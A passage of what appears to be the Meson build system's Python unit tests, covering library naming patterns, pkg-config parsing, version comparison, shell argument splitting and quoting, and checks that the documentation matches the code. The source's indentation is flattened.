def test_find_library_patterns(self):
'''
Unit test for the library search patterns used by find_library()
'''
unix_static = ('lib{}.a', '{}.a')
msvc_static = ('lib{}.a', 'lib{}.lib', '{}.a', '{}.lib')
# This is the priority list of pattern matching for library searching
patterns = {'openbsd': {'shared': ('lib{}.so', '{}.so', 'lib{}.so.[0-9]*.[0-9]*', '{}.so.[0-9]*.[0-9]*'),
'static': unix_static},
'linux': {'shared': ('lib{}.so', '{}.so'),
'static': unix_static},
'darwin': {'shared': ('lib{}.dylib', 'lib{}.so', '{}.dylib', '{}.so'),
'static': unix_static},
'cygwin': {'shared': ('cyg{}.dll', 'cyg{}.dll.a', 'lib{}.dll',
'lib{}.dll.a', '{}.dll', '{}.dll.a'),
'static': ('cyg{}.a',) + unix_static},
'windows-msvc': {'shared': ('lib{}.lib', '{}.lib'),
'static': msvc_static},
'windows-mingw': {'shared': ('lib{}.dll.a', 'lib{}.lib', 'lib{}.dll',
'{}.dll.a', '{}.lib', '{}.dll'),
'static': msvc_static}}
env = get_fake_env()
cc = env.detect_c_compiler(MachineChoice.HOST)
if is_osx():
self._test_all_naming(cc, env, patterns, 'darwin')
elif is_cygwin():
self._test_all_naming(cc, env, patterns, 'cygwin')
elif is_windows():
if cc.get_argument_syntax() == 'msvc':
self._test_all_naming(cc, env, patterns, 'windows-msvc')
else:
self._test_all_naming(cc, env, patterns, 'windows-mingw')
elif is_openbsd():
self._test_all_naming(cc, env, patterns, 'openbsd')
else:
self._test_all_naming(cc, env, patterns, 'linux')
env.machines.host.system = 'openbsd'
self._test_all_naming(cc, env, patterns, 'openbsd')
env.machines.host.system = 'darwin'
self._test_all_naming(cc, env, patterns, 'darwin')
env.machines.host.system = 'cygwin'
self._test_all_naming(cc, env, patterns, 'cygwin')
env.machines.host.system = 'windows'
self._test_all_naming(cc, env, patterns, 'windows-mingw')
@skipIfNoPkgconfig
def test_pkgconfig_parse_libs(self):
'''
Unit test for parsing of pkg-config output to search for libraries
https://github.com/mesonbuild/meson/issues/3951
'''
def create_static_lib(name):
if not is_osx():
name.open('w').close()
return
src = name.with_suffix('.c')
out = name.with_suffix('.o')
with src.open('w') as f:
f.write('int meson_foobar (void) { return 0; }')
subprocess.check_call(['clang', '-c', str(src), '-o', str(out)])
subprocess.check_call(['ar', 'csr', str(name), str(out)])
with tempfile.TemporaryDirectory() as tmpdir:
pkgbin = ExternalProgram('pkg-config', command=['pkg-config'], silent=True)
env = get_fake_env()
compiler = env.detect_c_compiler(MachineChoice.HOST)
env.coredata.compilers.host = {'c': compiler}
env.coredata.compiler_options.host['c']['link_args'] = FakeCompilerOptions()
p1 = Path(tmpdir) / '1'
p2 = Path(tmpdir) / '2'
p1.mkdir()
p2.mkdir()
# libfoo.a is in one prefix
create_static_lib(p1 / 'libfoo.a')
# libbar.a is in both prefixes
create_static_lib(p1 / 'libbar.a')
create_static_lib(p2 / 'libbar.a')
# Ensure that we never statically link to these
create_static_lib(p1 / 'libpthread.a')
create_static_lib(p1 / 'libm.a')
create_static_lib(p1 / 'libc.a')
create_static_lib(p1 / 'libdl.a')
create_static_lib(p1 / 'librt.a')
def fake_call_pkgbin(self, args, env=None):
if '--libs' not in args:
return 0, '', ''
if args[0] == 'foo':
return 0, '-L{} -lfoo -L{} -lbar'.format(p2.as_posix(), p1.as_posix()), ''
if args[0] == 'bar':
return 0, '-L{} -lbar'.format(p2.as_posix()), ''
if args[0] == 'internal':
return 0, '-L{} -lpthread -lm -lc -lrt -ldl'.format(p1.as_posix()), ''
old_call = PkgConfigDependency._call_pkgbin
old_check = PkgConfigDependency.check_pkgconfig
PkgConfigDependency._call_pkgbin = fake_call_pkgbin
PkgConfigDependency.check_pkgconfig = lambda x, _: pkgbin
# Test begins
try:
kwargs = {'required': True, 'silent': True}
foo_dep = PkgConfigDependency('foo', env, kwargs)
self.assertEqual(foo_dep.get_link_args(),
[(p1 / 'libfoo.a').as_posix(), (p2 / 'libbar.a').as_posix()])
bar_dep = PkgConfigDependency('bar', env, kwargs)
self.assertEqual(bar_dep.get_link_args(), [(p2 / 'libbar.a').as_posix()])
internal_dep = PkgConfigDependency('internal', env, kwargs)
if compiler.get_argument_syntax() == 'msvc':
self.assertEqual(internal_dep.get_link_args(), [])
else:
link_args = internal_dep.get_link_args()
for link_arg in link_args:
for lib in ('pthread', 'm', 'c', 'dl', 'rt'):
self.assertNotIn('lib{}.a'.format(lib), link_arg, msg=link_args)
finally:
# Test ends
PkgConfigDependency._call_pkgbin = old_call
PkgConfigDependency.check_pkgconfig = old_check
# Reset dependency class to ensure that in-process configure doesn't mess up
PkgConfigDependency.pkgbin_cache = {}
PkgConfigDependency.class_pkgbin = PerMachine(None, None)
def test_version_compare(self):
comparefunc = mesonbuild.mesonlib.version_compare_many
for (a, b, result) in [
('0.99.beta19', '>= 0.99.beta14', True),
]:
self.assertEqual(comparefunc(a, b)[0], result)
for (a, b, op) in [
# examples from https://fedoraproject.org/wiki/Archive:Tools/RPM/VersionComparison
("1.0010", "1.9", operator.gt),
("1.05", "1.5", operator.eq),
("1.0", "1", operator.gt),
("2.50", "2.5", operator.gt),
("fc4", "fc.4", operator.eq),
("FC5", "fc4", operator.lt),
("2a", "2.0", operator.lt),
("1.0", "1.fc4", operator.gt),
("3.0.0_fc", "3.0.0.fc", operator.eq),
# from RPM tests
("1.0", "1.0", operator.eq),
("1.0", "2.0", operator.lt),
("2.0", "1.0", operator.gt),
("2.0.1", "2.0.1", operator.eq),
("2.0", "2.0.1", operator.lt),
("2.0.1", "2.0", operator.gt),
("2.0.1a", "2.0.1a", operator.eq),
("2.0.1a", "2.0.1", operator.gt),
("2.0.1", "2.0.1a", operator.lt),
("5.5p1", "5.5p1", operator.eq),
("5.5p1", "5.5p2", operator.lt),
("5.5p2", "5.5p1", operator.gt),
("5.5p10", "5.5p10", operator.eq),
("5.5p1", "5.5p10", operator.lt),
("5.5p10", "5.5p1", operator.gt),
("10xyz", "10.1xyz", operator.lt),
("10.1xyz", "10xyz", operator.gt),
("xyz10", "xyz10", operator.eq),
("xyz10", "xyz10.1", operator.lt),
("xyz10.1", "xyz10", operator.gt),
("xyz.4", "xyz.4", operator.eq),
("xyz.4", "8", operator.lt),
("8", "xyz.4", operator.gt),
("xyz.4", "2", operator.lt),
("2", "xyz.4", operator.gt),
("5.5p2", "5.6p1", operator.lt),
("5.6p1", "5.5p2", operator.gt),
("5.6p1", "6.5p1", operator.lt),
("6.5p1", "5.6p1", operator.gt),
("6.0.rc1", "6.0", operator.gt),
("6.0", "6.0.rc1", operator.lt),
("10b2", "10a1", operator.gt),
("10a2", "10b2", operator.lt),
("1.0aa", "1.0aa", operator.eq),
("1.0a", "1.0aa", operator.lt),
("1.0aa", "1.0a", operator.gt),
("10.0001", "10.0001", operator.eq),
("10.0001", "10.1", operator.eq),
("10.1", "10.0001", operator.eq),
("10.0001", "10.0039", operator.lt),
("10.0039", "10.0001", operator.gt),
("4.999.9", "5.0", operator.lt),
("5.0", "4.999.9", operator.gt),
("20101121", "20101121", operator.eq),
("20101121", "20101122", operator.lt),
("20101122", "20101121", operator.gt),
("2_0", "2_0", operator.eq),
("2.0", "2_0", operator.eq),
("2_0", "2.0", operator.eq),
("a", "a", operator.eq),
("a+", "a+", operator.eq),
("a+", "a_", operator.eq),
("a_", "a+", operator.eq),
("+a", "+a", operator.eq),
("+a", "_a", operator.eq),
("_a", "+a", operator.eq),
("+_", "+_", operator.eq),
("_+", "+_", operator.eq),
("_+", "_+", operator.eq),
("+", "_", operator.eq),
("_", "+", operator.eq),
# other tests
('0.99.beta19', '0.99.beta14', operator.gt),
("1.0.0", "2.0.0", operator.lt),
(".0.0", "2.0.0", operator.lt),
("alpha", "beta", operator.lt),
("1.0", "1.0.0", operator.lt),
("2.456", "2.1000", operator.lt),
("2.1000", "3.111", operator.lt),
("2.001", "2.1", operator.eq),
("2.34", "2.34", operator.eq),
("6.1.2", "6.3.8", operator.lt),
("1.7.3.0", "2.0.0", operator.lt),
("2.24.51", "2.25", operator.lt),
("2.1.5+20120813+gitdcbe778", "2.1.5", operator.gt),
("3.4.1", "3.4b1", operator.gt),
("041206", "200090325", operator.lt),
("0.6.2+git20130413", "0.6.2", operator.gt),
("2.6.0+bzr6602", "2.6.0", operator.gt),
("2.6.0", "2.6b2", operator.gt),
("2.6.0+bzr6602", "2.6b2x", operator.gt),
("0.6.7+20150214+git3a710f9", "0.6.7", operator.gt),
("15.8b", "15.8.0.1", operator.lt),
("1.2rc1", "1.2.0", operator.lt),
]:
ver_a = Version(a)
ver_b = Version(b)
if op is operator.eq:
for o, name in [(op, 'eq'), (operator.ge, 'ge'), (operator.le, 'le')]:
self.assertTrue(o(ver_a, ver_b), '{} {} {}'.format(ver_a, name, ver_b))
if op is operator.lt:
for o, name in [(op, 'lt'), (operator.le, 'le'), (operator.ne, 'ne')]:
self.assertTrue(o(ver_a, ver_b), '{} {} {}'.format(ver_a, name, ver_b))
for o, name in [(operator.gt, 'gt'), (operator.ge, 'ge'), (operator.eq, 'eq')]:
self.assertFalse(o(ver_a, ver_b), '{} {} {}'.format(ver_a, name, ver_b))
if op is operator.gt:
for o, name in [(op, 'gt'), (operator.ge, 'ge'), (operator.ne, 'ne')]:
self.assertTrue(o(ver_a, ver_b), '{} {} {}'.format(ver_a, name, ver_b))
for o, name in [(operator.lt, 'lt'), (operator.le, 'le'), (operator.eq, 'eq')]:
self.assertFalse(o(ver_a, ver_b), '{} {} {}'.format(ver_a, name, ver_b))
def test_msvc_toolset_version(self):
'''
Ensure that the toolset version returns the correct value for this MSVC
'''
env = get_fake_env()
cc = env.detect_c_compiler(MachineChoice.HOST)
if cc.get_argument_syntax() != 'msvc':
raise unittest.SkipTest('Test only applies to MSVC-like compilers')
toolset_ver = cc.get_toolset_version()
self.assertIsNotNone(toolset_ver)
# Visual Studio 2015 and older versions do not define VCToolsVersion
# TODO: ICL doesn't set this in the VSC2015 profile either
if cc.id == 'msvc' and int(''.join(cc.version.split('.')[0:2])) < 1910:
return
if 'VCToolsVersion' in os.environ:
vctools_ver = os.environ['VCToolsVersion']
else:
self.assertIn('VCINSTALLDIR', os.environ)
# See https://devblogs.microsoft.com/cppblog/finding-the-visual-c-compiler-tools-in-visual-studio-2017/
vctools_ver = (Path(os.environ['VCINSTALLDIR']) / 'Auxiliary' / 'Build' / 'Microsoft.VCToolsVersion.default.txt').read_text()
self.assertTrue(vctools_ver.startswith(toolset_ver),
msg='{!r} does not start with {!r}'.format(vctools_ver, toolset_ver))
def test_split_args(self):
split_args = mesonbuild.mesonlib.split_args
join_args = mesonbuild.mesonlib.join_args
if is_windows():
test_data = [
# examples from https://docs.microsoft.com/en-us/cpp/c-language/parsing-c-command-line-arguments
(r'"a b c" d e', ['a b c', 'd', 'e'], True),
(r'"ab\"c" "\\" d', ['ab"c', '\\', 'd'], False),
(r'a\\\b d"e f"g h', [r'a\\\b', 'de fg', 'h'], False),
(r'a\\\"b c d', [r'a\"b', 'c', 'd'], False),
(r'a\\\\"b c" d e', [r'a\\b c', 'd', 'e'], False),
# other basics
(r'""', [''], True),
(r'a b c d "" e', ['a', 'b', 'c', 'd', '', 'e'], True),
(r"'a b c' d e", ["'a", 'b', "c'", 'd', 'e'], True),
(r"'a&b&c' d e", ["'a&b&c'", 'd', 'e'], True),
(r"a & b & c d e", ['a', '&', 'b', '&', 'c', 'd', 'e'], True),
(r"'a & b & c d e'", ["'a", '&', 'b', '&', 'c', 'd', "e'"], True),
('a b\nc\rd \n\re', ['a', 'b', 'c', 'd', 'e'], False),
# more illustrative tests
(r'cl test.cpp /O1 /Fe:test.exe', ['cl', 'test.cpp', '/O1', '/Fe:test.exe'], True),
(r'cl "test.cpp /O1 /Fe:test.exe"', ['cl', 'test.cpp /O1 /Fe:test.exe'], True),
(r'cl /DNAME=\"Bob\" test.cpp', ['cl', '/DNAME="Bob"', 'test.cpp'], False),
(r'cl "/DNAME=\"Bob\"" test.cpp', ['cl', '/DNAME="Bob"', 'test.cpp'], True),
(r'cl /DNAME=\"Bob, Alice\" test.cpp', ['cl', '/DNAME="Bob,', 'Alice"', 'test.cpp'], False),
(r'cl "/DNAME=\"Bob, Alice\"" test.cpp', ['cl', '/DNAME="Bob, Alice"', 'test.cpp'], True),
(r'cl C:\path\with\backslashes.cpp', ['cl', r'C:\path\with\backslashes.cpp'], True),
(r'cl C:\\path\\with\\double\\backslashes.cpp', ['cl', r'C:\\path\\with\\double\\backslashes.cpp'], True),
(r'cl "C:\\path\\with\\double\\backslashes.cpp"', ['cl', r'C:\\path\\with\\double\\backslashes.cpp'], False),
(r'cl C:\path with spaces\test.cpp', ['cl', r'C:\path', 'with', r'spaces\test.cpp'], False),
(r'cl "C:\path with spaces\test.cpp"', ['cl', r'C:\path with spaces\test.cpp'], True),
(r'cl /DPATH="C:\path\with\backslashes test.cpp', ['cl', r'/DPATH=C:\path\with\backslashes test.cpp'], False),
(r'cl /DPATH=\"C:\\ends\\with\\backslashes\\\" test.cpp', ['cl', r'/DPATH="C:\\ends\\with\\backslashes\"', 'test.cpp'], False),
(r'cl /DPATH="C:\\ends\\with\\backslashes\\" test.cpp', ['cl', '/DPATH=C:\\\\ends\\\\with\\\\backslashes\\', 'test.cpp'], False),
(r'cl "/DNAME=\"C:\\ends\\with\\backslashes\\\"" test.cpp', ['cl', r'/DNAME="C:\\ends\\with\\backslashes\"', 'test.cpp'], True),
(r'cl "/DNAME=\"C:\\ends\\with\\backslashes\\\\"" test.cpp', ['cl', r'/DNAME="C:\\ends\\with\\backslashes\\ test.cpp'], False),
(r'cl "/DNAME=\"C:\\ends\\with\\backslashes\\\\\"" test.cpp', ['cl', r'/DNAME="C:\\ends\\with\\backslashes\\"', 'test.cpp'], True),
]
else:
test_data = [
(r"'a b c' d e", ['a b c', 'd', 'e'], True),
(r"a/b/c d e", ['a/b/c', 'd', 'e'], True),
(r"a\b\c d e", [r'abc', 'd', 'e'], False),
(r"a\\b\\c d e", [r'a\b\c', 'd', 'e'], False),
(r'"a b c" d e', ['a b c', 'd', 'e'], False),
(r'"a\\b\\c\\" d e', ['a\\b\\c\\', 'd', 'e'], False),
(r"'a\b\c\' d e", ['a\\b\\c\\', 'd', 'e'], True),
(r"'a&b&c' d e", ['a&b&c', 'd', 'e'], True),
(r"a & b & c d e", ['a', '&', 'b', '&', 'c', 'd', 'e'], False),
(r"'a & b & c d e'", ['a & b & c d e'], True),
(r"abd'e f'g h", [r'abde fg', 'h'], False),
('a b\nc\rd \n\re', ['a', 'b', 'c', 'd', 'e'], False),
('g++ -DNAME="Bob" test.cpp', ['g++', '-DNAME=Bob', 'test.cpp'], False),
("g++ '-DNAME=\"Bob\"' test.cpp", ['g++', '-DNAME="Bob"', 'test.cpp'], True),
('g++ -DNAME="Bob, Alice" test.cpp', ['g++', '-DNAME=Bob, Alice', 'test.cpp'], False),
("g++ '-DNAME=\"Bob, Alice\"' test.cpp", ['g++', '-DNAME="Bob, Alice"', 'test.cpp'], True),
]
for (cmd, expected, roundtrip) in test_data:
self.assertEqual(split_args(cmd), expected)
if roundtrip:
self.assertEqual(join_args(expected), cmd)
def test_quote_arg(self):
split_args = mesonbuild.mesonlib.split_args
quote_arg = mesonbuild.mesonlib.quote_arg
if is_windows():
test_data = [
('', '""'),
('arg1', 'arg1'),
('/option1', '/option1'),
('/Ovalue', '/Ovalue'),
('/OBob&Alice', '/OBob&Alice'),
('/Ovalue with spaces', r'"/Ovalue with spaces"'),
(r'/O"value with spaces"', r'"/O\"value with spaces\""'),
(r'/OC:\path with spaces\test.exe', r'"/OC:\path with spaces\test.exe"'),
('/LIBPATH:C:\\path with spaces\\ends\\with\\backslashes\\', r'"/LIBPATH:C:\path with spaces\ends\with\backslashes\\"'),
('/LIBPATH:"C:\\path with spaces\\ends\\with\\backslashes\\\\"', r'"/LIBPATH:\"C:\path with spaces\ends\with\backslashes\\\\\""'),
(r'/DMSG="Alice said: \"Let\'s go\""', r'"/DMSG=\"Alice said: \\\"Let\'s go\\\"\""'),
]
else:
test_data = [
('arg1', 'arg1'),
('--option1', '--option1'),
('-O=value', '-O=value'),
('-O=Bob&Alice', "'-O=Bob&Alice'"),
('-O=value with spaces', "'-O=value with spaces'"),
('-O="value with spaces"', '\'-O=\"value with spaces\"\''),
('-O=/path with spaces/test', '\'-O=/path with spaces/test\''),
('-DMSG="Alice said: \\"Let\'s go\\""', "'-DMSG=\"Alice said: \\\"Let'\"'\"'s go\\\"\"'"),
]
for (arg, expected) in test_data:
self.assertEqual(quote_arg(arg), expected)
self.assertEqual(split_args(expected)[0], arg)
def test_depfile(self):
for (f, target, expdeps) in [
# empty, unknown target
([''], 'unknown', set()),
# simple target & deps
(['meson/foo.o : foo.c foo.h'], 'meson/foo.o', set({'foo.c', 'foo.h'})),
(['meson/foo.o: foo.c foo.h'], 'foo.c', set()),
# get all deps
(['meson/foo.o: foo.c foo.h',
'foo.c: gen.py'], 'meson/foo.o', set({'foo.c', 'foo.h', 'gen.py'})),
(['meson/foo.o: foo.c foo.h',
'foo.c: gen.py'], 'foo.c', set({'gen.py'})),
# linue continuation, multiple targets
(['foo.o \\', 'foo.h: bar'], 'foo.h', set({'bar'})),
(['foo.o \\', 'foo.h: bar'], 'foo.o', set({'bar'})),
# \\ handling
(['foo: Program\\ F\\iles\\\\X'], 'foo', set({'Program Files\\X'})),
# $ handling
(['f$o.o: c/b'], 'f$o.o', set({'c/b'})),
(['f$$o.o: c/b'], 'f$o.o', set({'c/b'})),
# cycles
(['a: b', 'b: a'], 'a', set({'a', 'b'})),
(['a: b', 'b: a'], 'b', set({'a', 'b'})),
]:
d = mesonbuild.depfile.DepFile(f)
deps = d.get_all_dependencies(target)
self.assertEqual(deps, expdeps)
def test_log_once(self):
f = io.StringIO()
with mock.patch('mesonbuild.mlog.log_file', f), \
mock.patch('mesonbuild.mlog._logged_once', set()):
mesonbuild.mlog.log_once('foo')
mesonbuild.mlog.log_once('foo')
actual = f.getvalue().strip()
self.assertEqual(actual, 'foo', actual)
def test_log_once_ansi(self):
f = io.StringIO()
with mock.patch('mesonbuild.mlog.log_file', f), \
mock.patch('mesonbuild.mlog._logged_once', set()):
mesonbuild.mlog.log_once(mesonbuild.mlog.bold('foo'))
mesonbuild.mlog.log_once(mesonbuild.mlog.bold('foo'))
actual = f.getvalue().strip()
self.assertEqual(actual.count('foo'), 1, actual)
mesonbuild.mlog.log_once('foo')
actual = f.getvalue().strip()
self.assertEqual(actual.count('foo'), 1, actual)
f.truncate()
mesonbuild.mlog.warning('bar', once=True)
mesonbuild.mlog.warning('bar', once=True)
actual = f.getvalue().strip()
self.assertEqual(actual.count('bar'), 1, actual)
def test_sort_libpaths(self):
sort_libpaths = mesonbuild.dependencies.base.sort_libpaths
self.assertEqual(sort_libpaths(
['/home/mesonuser/.local/lib', '/usr/local/lib', '/usr/lib'],
['/home/mesonuser/.local/lib/pkgconfig', '/usr/local/lib/pkgconfig']),
['/home/mesonuser/.local/lib', '/usr/local/lib', '/usr/lib'])
self.assertEqual(sort_libpaths(
['/usr/local/lib', '/home/mesonuser/.local/lib', '/usr/lib'],
['/home/mesonuser/.local/lib/pkgconfig', '/usr/local/lib/pkgconfig']),
['/home/mesonuser/.local/lib', '/usr/local/lib', '/usr/lib'])
self.assertEqual(sort_libpaths(
['/usr/lib', '/usr/local/lib', '/home/mesonuser/.local/lib'],
['/home/mesonuser/.local/lib/pkgconfig', '/usr/local/lib/pkgconfig']),
['/home/mesonuser/.local/lib', '/usr/local/lib', '/usr/lib'])
self.assertEqual(sort_libpaths(
['/usr/lib', '/usr/local/lib', '/home/mesonuser/.local/lib'],
['/home/mesonuser/.local/lib/pkgconfig', '/usr/local/libdata/pkgconfig']),
['/home/mesonuser/.local/lib', '/usr/local/lib', '/usr/lib'])
def test_dependency_factory_order(self):
b = mesonbuild.dependencies.base
with tempfile.TemporaryDirectory() as tmpdir:
with chdir(tmpdir):
env = get_fake_env()
f = b.DependencyFactory(
'test_dep',
methods=[b.DependencyMethods.PKGCONFIG, b.DependencyMethods.CMAKE]
)
actual = [m() for m in f(env, MachineChoice.HOST, {'required': False})]
self.assertListEqual([m.type_name for m in actual], ['pkgconfig', 'cmake'])
f = b.DependencyFactory(
'test_dep',
methods=[b.DependencyMethods.CMAKE, b.DependencyMethods.PKGCONFIG]
)
actual = [m() for m in f(env, MachineChoice.HOST, {'required': False})]
self.assertListEqual([m.type_name for m in actual], ['cmake', 'pkgconfig'])
def test_validate_json(self) -> None:
"""Validate the json schema for the test cases."""
try:
from jsonschema import validate, ValidationError
except ImportError:
if is_ci():
raise
raise unittest.SkipTest('Python jsonschema module not found.')
with Path('data/test.schema.json').open() as f:
schema = json.load(f)
errors = [] # type: T.Tuple[str, Exception]
for p in Path('test cases').glob('**/test.json'):
with p.open() as f:
try:
validate(json.load(f), schema=schema)
except ValidationError as e:
errors.append((p.resolve(), e))
for f, e in errors:
print('Failed to validate: "{}"'.format(f))
print(str(e))
self.assertFalse(errors)
@unittest.skipIf(is_tarball(), 'Skipping because this is a tarball release')
class DataTests(unittest.TestCase):
def test_snippets(self):
hashcounter = re.compile('^ *(#)+')
snippet_dir = Path('docs/markdown/snippets')
self.assertTrue(snippet_dir.is_dir())
for f in snippet_dir.glob('*'):
self.assertTrue(f.is_file())
if f.parts[-1].endswith('~'):
continue
if f.suffix == '.md':
in_code_block = False
with f.open() as snippet:
for line in snippet:
if line.startswith(' '):
continue
if line.startswith('```'):
in_code_block = not in_code_block
if in_code_block:
continue
m = re.match(hashcounter, line)
if m:
self.assertEqual(len(m.group(0)), 2, 'All headings in snippets must have two hash symbols: ' + f.name)
self.assertFalse(in_code_block, 'Unclosed code block.')
else:
if f.name != 'add_release_note_snippets_here':
self.assertTrue(False, 'A file without .md suffix in snippets dir: ' + f.name)
def test_compiler_options_documented(self):
'''
Test that C and C++ compiler options and base options are documented in
Builtin-Options.md. Only tests the default compiler for the current
platform on the CI.
'''
md = None
with open('docs/markdown/Builtin-options.md', encoding='utf-8') as f:
md = f.read()
self.assertIsNotNone(md)
env = get_fake_env()
# FIXME: Support other compilers
cc = env.detect_c_compiler(MachineChoice.HOST)
cpp = env.detect_cpp_compiler(MachineChoice.HOST)
for comp in (cc, cpp):
for opt in comp.get_options().keys():
self.assertIn(opt, md)
for opt in comp.base_options:
self.assertIn(opt, md)
self.assertNotIn('b_unknown', md)
@staticmethod
def _get_section_content(name, sections, md):
for section in sections:
if section and section.group(1) == name:
try:
next_section = next(sections)
end = next_section.start()
except StopIteration:
end = len(md)
# Extract the content for this section
return md[section.end():end]
raise RuntimeError('Could not find "{}" heading'.format(name))
def test_builtin_options_documented(self):
'''
Test that universal options and base options are documented in
Builtin-Options.md.
'''
from itertools import tee
md = None
with open('docs/markdown/Builtin-options.md', encoding='utf-8') as f:
md = f.read()
self.assertIsNotNone(md)
found_entries = set()
sections = re.finditer(r"^## (.+)$", md, re.MULTILINE)
# Extract the content for this section
content = self._get_section_content("Universal options", sections, md)
subsections = tee(re.finditer(r"^### (.+)$", content, re.MULTILINE))
subcontent1 = self._get_section_content("Directories", subsections[0], content)
subcontent2 = self._get_section_content("Core options", subsections[1], content)
for subcontent in (subcontent1, subcontent2):
# Find the option names
options = set()
# Match either a table row or a table heading separator: | ------ |
rows = re.finditer(r"^\|(?: (\w+) .* | *-+ *)\|", subcontent, re.MULTILINE)
# Skip the header of the first table
next(rows)
# Skip the heading separator of the first table
next(rows)
for m in rows:
value = m.group(1)
# End when the `buildtype` table starts
if value is None:
break
options.add(value)
self.assertEqual(len(found_entries & options), 0)
found_entries |= options
self.assertEqual(found_entries, set([
*mesonbuild.coredata.BUILTIN_OPTIONS.keys(),
*mesonbuild.coredata.BUILTIN_OPTIONS_PER_MACHINE.keys()
]))
# Check that `buildtype` table inside `Core options` matches how
# setting of builtin options behaves
#
# Find all tables inside this subsection
tables = re.finditer(r"^\| (\w+) .* \|\n\| *[-|\s]+ *\|$", subcontent2, re.MULTILINE)
# Get the table we want using the header of the first column
table = self._get_section_content('buildtype', tables, subcontent2)
# Get table row data
rows = re.finditer(r"^\|(?: (\w+)\s+\| (\w+)\s+\| (\w+) .* | *-+ *)\|", table, re.MULTILINE)
env = get_fake_env()
for m in rows:
buildtype, debug, opt = m.groups()
if debug == 'true':
debug = True
elif debug == 'false':
debug = False
else:
raise RuntimeError('Invalid debug value {!r} in row:\n{}'.format(debug, m.group()))
env.coredata.set_builtin_option('buildtype', buildtype)
self.assertEqual(env.coredata.builtins['buildtype'].value, buildtype)
self.assertEqual(env.coredata.builtins['optimization'].value, opt)
self.assertEqual(env.coredata.builtins['debug'].value, debug)
def test_cpu_families_documented(self):
with open("docs/markdown/Reference-tables.md", encoding='utf-8') as f:
md = f.read()
self.assertIsNotNone(md)
sections = re.finditer(r"^## (.+)$", md, re.MULTILINE)
content = self._get_section_content("CPU families", sections, md)
# Find the list entries
arches = [m.group(1) for m in re.finditer(r"^\| (\w+) +\|", content, re.MULTILINE)]
# Drop the header
arches = set(arches[1:])
self.assertEqual(arches, set(mesonbuild.environment.known_cpu_families))
def test_markdown_files_in_sitemap(self):
'''
Test that each markdown files in docs/markdown is referenced in sitemap.txt
'''
with open("docs/sitemap.txt", encoding='utf-8') as f:
md = f.read()
self.assertIsNotNone(md)
toc = list(m.group(1) for m in re.finditer(r"^\s*(\w.*)$", md, re.MULTILINE))
markdownfiles = [f.name for f in Path("docs/markdown").iterdir() if f.is_file() and f.suffix == '.md']
exceptions = ['_Sidebar.md']
for f in markdownfiles:
if f not in exceptions:
self.assertIn(f, toc)
def test_vim_syntax_highlighting(self):
'''
Ensure that vim syntax highlighting files were updated for new
functions in the global namespace in build files.
'''
env = get_fake_env()
interp = Interpreter(FakeBuild(env), mock=True)
with open('data/syntax-highlighting/vim/syntax/meson.vim') as f:
res = re.search(r'syn keyword mesonBuiltin(\s+\\\s\w+)+', f.read(), re.MULTILINE)
defined = set([a.strip() for a in res.group().split('\\')][1:])
self.assertEqual(defined, set(chain(interp.funcs.keys(), interp.builtin.keys())))
@unittest.skipIf(is_pull(), 'Skipping because this is a pull request')
def test_json_grammar_syntax_highlighting(self):
'''
Ensure that syntax highlighting JSON grammar written by TingPing was
updated for new functions in the global namespace in build files.
https://github.com/TingPing/language-meson/
'''
env = get_fake_env()
interp = Interpreter(FakeBuild(env), mock=True)
url = 'https://raw.githubusercontent.com/TingPing/language-meson/master/grammars/meson.json'
try:
# Use a timeout to avoid blocking forever in case the network is
# slow or unavailable in a weird way
r = urllib.request.urlopen(url, timeout=URLOPEN_TIMEOUT)
except urllib.error.URLError as e:
# Skip test when network is not available, such as during packaging
# by a distro or Flatpak
if not isinstance(e, urllib.error.HTTPError):
raise unittest.SkipTest('Network unavailable')
# Don't fail the test if github is down, but do fail if 4xx
if e.code >= 500:
raise unittest.SkipTest('Server error ' + str(e.code))
raise e
# On Python 3.5, we must decode bytes to string. Newer versions don't require that.
grammar = json.loads(r.read().decode('utf-8', 'surrogatepass'))
for each in grammar['patterns']:
if 'name' in each and each['name'] == 'support.function.builtin.meson':
# The string is of the form: (?x)\\b(func1|func2|...\n)\\b\\s*(?=\\() and
# we convert that to [func1, func2, ...] without using regex to parse regex
funcs = set(each['match'].split('\\b(')[1].split('\n')[0].split('|'))
if 'name' in each and each['name'] == 'support.variable.meson':
# \\b(builtin1|builtin2...)\\b
builtin = set(each['match'].split('\\b(')[1].split(')\\b')[0].split('|'))
self.assertEqual(builtin, set(interp.builtin.keys()))
self.assertEqual(funcs, set(interp.funcs.keys()))
def test_all_functions_defined_in_ast_interpreter(self):
'''
Ensure that the all functions defined in the Interpreter are also defined
in the AstInterpreter (and vice versa).
'''
env = get_fake_env()
interp = Interpreter(FakeBuild(env), mock=True)
astint = AstInterpreter('.', '', '')
self.assertEqual(set(interp.funcs.keys()), set(astint.funcs.keys()))
def test_mesondata_is_up_to_date(self):
from mesonbuild.mesondata import mesondata
err_msg = textwrap.dedent('''
###########################################################
### mesonbuild.mesondata is not up-to-date ###
### Please regenerate it by running tools/gen_data.py ###
###########################################################
''')
root_dir = Path(__file__).resolve().parent
mesonbuild_dir = root_dir / 'mesonbuild'
data_dirs = mesonbuild_dir.glob('**/data')
data_files = [] # type: T.List[T.Tuple(str, str)]
for i in data_dirs:
for p in i.iterdir():
data_files += [(p.relative_to(mesonbuild_dir).as_posix(), hashlib.sha256(p.read_bytes()).hexdigest())]
from pprint import pprint
current_files = set(mesondata.keys())
scanned_files = set([x[0] for x in data_files])
self.assertSetEqual(current_files, scanned_files, err_msg + 'Data files were added or removed\n')
errors = []
for i in data_files:
if mesondata[i[0]].sha256sum != i[1]:
errors += [i[0]]
self.assertListEqual(errors, [], err_msg + 'Files were changed')
class BasePlatformTests(unittest.TestCase):
prefix = '/usr'
libdir = 'lib'
def setUp(self):
super().setUp()
self.maxDiff = None
src_root = os.path.dirname(__file__)
src_root = os.path.join(os.getcwd(), src_root)
self.src_root = src_root
# Get the backend
# FIXME: Extract this from argv?
self.backend = getattr(Backend, os.environ.get('MESON_UNIT_TEST_BACKEND', 'ninja'))
self.meson_args = ['--backend=' + self.backend.name]
self.meson_native_file = None
self.meson_cross_file = None
self.meson_command = python_command + [get_meson_script()]
self.setup_command = self.meson_command + self.meson_args
self.mconf_command = self.meson_command + ['configure']
self.mintro_command = self.meson_command + ['introspect']
self.wrap_command = self.meson_command + ['wrap']
self.rewrite_command = self.meson_command + ['rewrite']
# Backend-specific build commands
self.build_command, self.clean_command, self.test_command, self.install_command, \
self.uninstall_command = get_backend_commands(self.backend)
# Test directories
self.common_test_dir = os.path.join(src_root, 'test cases/common')
self.vala_test_dir = os.path.join(src_root, 'test cases/vala')
